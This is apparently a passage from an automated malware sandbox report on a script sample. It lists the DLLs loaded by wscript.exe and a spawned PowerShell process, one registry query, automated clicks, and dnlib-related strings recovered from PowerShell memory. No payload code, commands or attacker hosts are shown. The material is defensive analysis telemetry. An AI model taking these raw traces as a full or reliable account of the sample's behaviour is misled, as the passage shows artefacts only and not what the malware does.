Source: C:\Windows\System32\wscript.exeSection loaded: urlmon.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: iertutil.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: srvcli.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: netutils.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: windows.staterepositoryps.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: wintypes.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: appresolver.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: bcp47langs.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: slc.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: sppc.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: onecorecommonproxystub.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasapi32.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasman.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rtutils.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mswsock.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winhttp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc6.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winnsi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasadhlp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: schannel.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mskeyprotect.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntasn1.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncrypt.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncryptsslp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: edputil.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.staterepositoryps.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wintypes.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appresolver.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: bcp47langs.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: slc.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sppc.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: onecorecommonproxystub.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: version.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: uxtheme.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: sxs.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: vbscript.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: amsi.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: userenv.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: profapi.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: wldp.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: msasn1.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: cryptsp.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: rsaenh.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: cryptbase.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: msisip.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: wshext.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: scrobj.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: textshaping.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: textinputframework.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: coreuicomponents.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: coremessaging.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: ntmarta.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: coremessaging.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: wintypes.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: wintypes.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: wintypes.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: version.dll
Source: C:\Windows\System32\wscript.exeSection loaded: kernel.appcore.dll
Source: C:\Windows\System32\wscript.exeSection loaded: uxtheme.dll
Source: C:\Windows\System32\wscript.exeSection loaded: sxs.dll
Source: C:\Windows\System32\wscript.exeSection loaded: vbscript.dll
Source: C:\Windows\System32\wscript.exeSection loaded: amsi.dll
Source: C:\Windows\System32\wscript.exeSection loaded: userenv.dll
Source: C:\Windows\System32\wscript.exeSection loaded: profapi.dll
Source: C:\Windows\System32\wscript.exeSection loaded: wldp.dll
Source: C:\Windows\System32\wscript.exeSection loaded: msasn1.dll
Source: C:\Windows\System32\wscript.exeSection loaded: cryptsp.dll
Source: C:\Windows\System32\wscript.exeSection loaded: rsaenh.dll
Source: C:\Windows\System32\wscript.exeSection loaded: cryptbase.dll
Source: C:\Windows\System32\wscript.exeSection loaded: msisip.dll
Source: C:\Windows\System32\wscript.exeSection loaded: wshext.dll
Source: C:\Windows\System32\wscript.exeSection loaded: scrobj.dll
Source: C:\Windows\System32\wscript.exeSection loaded: textshaping.dll
Source: C:\Windows\System32\wscript.exeSection loaded: textinputframework.dll
Source: C:\Windows\System32\wscript.exeSection loaded: coreuicomponents.dll
Source: C:\Windows\System32\wscript.exeSection loaded: coremessaging.dll
Source: C:\Windows\System32\wscript.exeSection loaded: ntmarta.dll
Source: C:\Windows\System32\wscript.exeSection loaded: coremessaging.dll
Source: C:\Windows\System32\wscript.exeSection loaded: wintypes.dll
Source: C:\Windows\System32\wscript.exeSection loaded: wintypes.dll
Source: C:\Windows\System32\wscript.exeSection loaded: wintypes.dll
Source: C:\Windows\System32\wscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{B54F3741-5B07-11cf-A4B0-00AA004A55E8}\InprocServer32Jump to behavior
Source: C:\Windows\System32\wscript.exeAutomated click: OK
Source: C:\Windows\System32\wscript.exeAutomated click: OK
Source: Window RecorderWindow detected: More than 3 window changes detected
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dllJump to behavior
Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Core\v4.0_4.0.0.0__b77a5c561934e089\System.Core.pdb[ source: powershell.exe, 00000003.00000002.2203709649.0000022A9B821000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetMemberRefProps source: powershell.exe, 00000003.00000002.2204838178.0000022A9BB00000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000003.00000002.2185790329.0000022A944FE000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetHandler source: powershell.exe, 00000003.00000002.2204838178.0000022A9BB00000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000003.00000002.2185790329.0000022A944FE000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumTypeRefs source: powershell.exe, 00000003.00000002.2204838178.0000022A9BB00000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000003.00000002.2185790329.0000022A944FE000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetParent source: powershell.exe, 00000003.00000002.2204838178.0000022A9BB00000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000003.00000002.2185790329.0000022A944FE000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.dotnet.pdb source: powershell.exe, 00000003.00000002.2211606771.00007FFD9BC50000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.ApplyEditAndContinue source: powershell.exe, 00000003.00000002.2204838178.0000022A9BB00000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000003.00000002.2185790329.0000022A944FE000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: System.Collections.Generic.IEnumerator<dnlib.DotNet.Pdb.PdbScope>.Current source: powershell.exe, 00000003.00000002.2204838178.0000022A9BB00000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000003.00000002.2185790329.0000022A944FE000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineModuleRef source: powershell.exe, 00000003.00000002.2204838178.0000022A9BB00000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000003.00000002.2185790329.0000022A944FE000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: m.Core.pdbpdb` source: powershell.exe, 00000003.00000002.2202319158.0000022A9B4E0000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetNameFromToken source: powershell.exe, 00000003.00000002.2204838178.0000022A9BB00000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000003.00000002.2185790329.0000022A944FE000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DeleteFieldMarshal source: powershell.exe, 00000003.00000002.2204838178.0000022A9BB00000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000003.00000002.2185790329.0000022A944FE000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumMembers source: powershell.exe, 00000003.00000002.2204838178.0000022A9BB00000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000003.00000002.2185790329.0000022A944FE000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.FindField source: powershell.exe, 00000003.00000002.2204838178.0000022A9BB00000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000003.00000002.2185790329.0000022A944FE000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DeleteClassLayout source: powershell.exe, 00000003.00000002.2204838178.0000022A9BB00000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000003.00000002.2185790329.0000022A944FE000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.IsValidToken source: powershell.exe, 00000003.00000002.2204838178.0000022A9BB00000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000003.00000002.2185790329.0000022A944FE000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.Merge source: powershell.exe, 00000003.00000002.2204838178.0000022A9BB00000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000003.00000002.2185790329.0000022A944FE000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.FindMemberRef source: powershell.exe, 00000003.00000002.2204838178.0000022A9BB00000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000003.00000002.2185790329.0000022A944FE000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetParamProps source: powershell.exe, 00000003.00000002.2204838178.0000022A9BB00000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000003.00000002.2185790329.0000022A944FE000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetParamProps source: powershell.exe, 00000003.00000002.2204838178.0000022A9BB00000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000003.00000002.2185790329.0000022A944FE000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.GetSaveSize source: powershell.exe, 00000003.00000002.2204838178.0000022A9BB00000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000003.00000002.2185790329.0000022A944FE000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.FindTypeRef source: powershell.exe, 00000003.00000002.2204838178.0000022A9BB00000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000003.00000002.2185790329.0000022A944FE000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.ResetEnum source: powershell.exe, 00000003.00000002.2204838178.0000022A9BB00000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000003.00000002.2185790329.0000022A944FE000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetMethodProps source: powershell.exe, 00000003.00000002.2204838178.0000022A9BB00000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000003.00000002.2185790329.0000022A944FE000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumProperties source: powershell.exe, 00000003.00000002.2204838178.0000022A9BB00000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000003.00000002.2185790329.0000022A944FE000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumMembersWithName source: powershell.exe, 00000003.00000002.2204838178.0000022A9BB00000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000003.00000002.2185790329.0000022A944FE000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetCustomAttributeValue source: powershell.exe, 00000003.00000002.2204838178.0000022A9BB00000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000003.00000002.2185790329.0000022A944FE000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumMethodImpls source: powershell.exe, 00000003.00000002.2204838178.0000022A9BB00000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000003.00000002.2185790329.0000022A944FE000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineCustomAttribute source: powershell.exe, 00000003.00000002.2204838178.0000022A9BB00000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000003.00000002.2185790329.0000022A944FE000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineEvent source: powershell.exe, 00000003.00000002.2204838178.0000022A9BB00000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000003.00000002.2185790329.0000022A944FE000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: n.pdb source: powershell.exe, 00000003.00000002.2203709649.0000022A9B82B000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetCustomAttributeByName source: powershell.exe, 00000003.00000002.2204838178.0000022A9BB00000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000003.00000002.2185790329.0000022A944FE000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineMethod source: powershell.exe, 00000003.00000002.2204838178.0000022A9BB00000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000003.00000002.2185790329.0000022A944FE000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.TranslateSigWithScope source: powershell.exe, 00000003.00000002.2204838178.0000022A9BB00000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000003.00000002.2185790329.0000022A944FE000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineUserString source: powershell.exe, 00000003.00000002.2204838178.0000022A9BB00000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000003.00000002.2185790329.0000022A944FE000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetTypeSpecFromToken source: powershell.exe, 00000003.00000002.2204838178.0000022A9BB00000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000003.00000002.2185790329.0000022A944FE000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.Save source: powershell.exe, 00000003.00000002.2204838178.0000022A9BB00000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000003.00000002.2185790329.0000022A944FE000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetPermissionSetProps source: powershell.exe, 00000003.00000002.2204838178.0000022A9BB00000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000003.00000002.2185790329.0000022A944FE000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.CountEnum source: powershell.exe, 00000003.00000002.2204838178.0000022A9BB00000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000003.00000002.2185790329.0000022A944FE000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumMethodSemantics source: powershell.exe, 00000003.00000002.2204838178.0000022A9BB00000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000003.00000002.2185790329.0000022A944FE000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetNativeCallConvFromSig source: powershell.exe, 00000003.00000002.2204838178.0000022A9BB00000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000003.00000002.2185790329.0000022A944FE000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumMethods source: powershell.exe, 00000003.00000002.2204838178.0000022A9BB00000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000003.00000002.2185790329.0000022A944FE000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumFields source: powershell.exe, 00000003.00000002.2204838178.0000022A9BB00000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000003.00000002.2185790329.0000022A944FE000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: System.Management.Automation.pdb source: powershell.exe, 00000003.00000002.2203709649.0000022A9B821000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetTypeRefProps source: powershell.exe, 00000003.00000002.2204838178.0000022A9BB00000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000003.00000002.2185790329.0000022A944FE000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: +dnlib.DotNet.Pdb.PdbWriter+<GetScopes>d__17K source: powershell.exe, 00000003.00000002.2204838178.0000022A9BB00000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000003.00000002.2185790329.0000022A944FE000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetSigFromToken source: powershell.exe, 00000003.00000002.2204838178.0000022A9BB00000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000003.00000002.2185790329.0000022A944FE000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumTypeSpecs source: powershell.exe, 00000003.00000002.2204838178.0000022A9BB00000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000003.00000002.2185790329.0000022A944FE000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.dotnet.pdb.dss source: powershell.exe, 00000003.00000002.2211606771.00007FFD9BC50000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.CloseEnum source: powershell.exe, 00000003.00000002.2204838178.0000022A9BB00000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000003.00000002.2185790329.0000022A944FE000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetModuleRefProps source: powershell.exe, 00000003.00000002.2204838178.0000022A9BB00000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000003.00000002.2185790329.0000022A944FE000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SaveToMemory source: powershell.exe, 00000003.00000002.2204838178.0000022A9BB00000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000003.00000002.2185790329.0000022A944FE000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.pdb source: powershell.exe, 00000003.00000002.2204838178.0000022A9BB00000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000003.00000002.2185790329.0000022A944FE000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb source: powershell.exe, 00000003.00000002.2204838178.0000022A9BB00000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000003.00000002.2185790329.0000022A944FE000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineTypeRefByName source: powershell.exe, 00000003.00000002.2204838178.0000022A9BB00000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000003.00000002.2185790329.0000022A944FE000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetScopeProps source: powershell.exe, 00000003.00000002.2204838178.0000022A9BB00000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000003.00000002.2185790329.0000022A944FE000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.FindMember source: powershell.exe, 00000003.00000002.2204838178.0000022A9BB00000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000003.00000002.2185790329.0000022A944FE000.00000004.00000800.00020000.00000000.sdmp
